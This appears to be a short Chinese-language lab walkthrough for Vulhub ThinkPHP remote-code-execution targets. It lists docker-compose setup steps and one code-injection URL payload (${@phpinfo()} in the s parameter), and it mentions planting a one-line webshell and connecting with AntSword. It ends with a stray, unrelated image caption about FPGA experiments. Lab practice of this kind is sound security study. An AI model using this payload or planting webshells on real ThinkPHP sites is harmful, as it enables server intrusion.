2-rec
1.启动环境
cd /.../vulhub/thinkphp/2-rce # cd进入2-rce靶场文件环境下
docker-compose up -d # docker-compose启动靶场
docker ps -a # 查看开启的靶场信息

2.访问192.168.146.136:8080网页

3.构造payload
http://192.168.146.136:8080/?s=/Index/index/L/${@phpinfo()}

4.写入一句话木马使用蚁剑链接
5.0.23-rce
1.环境启动
cd vulhub/thinkphp/5.0.23-rce/ #进入漏洞环境所在目录
docker-compose up -d #启动靶场
docker ps #查看容器信息

2.访问192.168.146.136:8080网页

3.进行远程命令执行


4.访问shell.php,蚁剑连接

5-rce
1.环境启动
cd /vulhub/thinkphp/5-rce #进入漏洞环境所在目录
docker-compose up -d #启动靶场
docker ps #查看容器信息
2.访问192.168.146.136:8080网页
3.寻找漏洞点
4. 写一句话木马进行链接


















![[米联客-XILINX-H3_CZ08_7100] FPGA程序设计基础实验连载-38 LVDS Select IO高速Serdes](https://i-blog.csdnimg.cn/direct/e4bfd07020994fd3a44a50ec47280fbf.png)


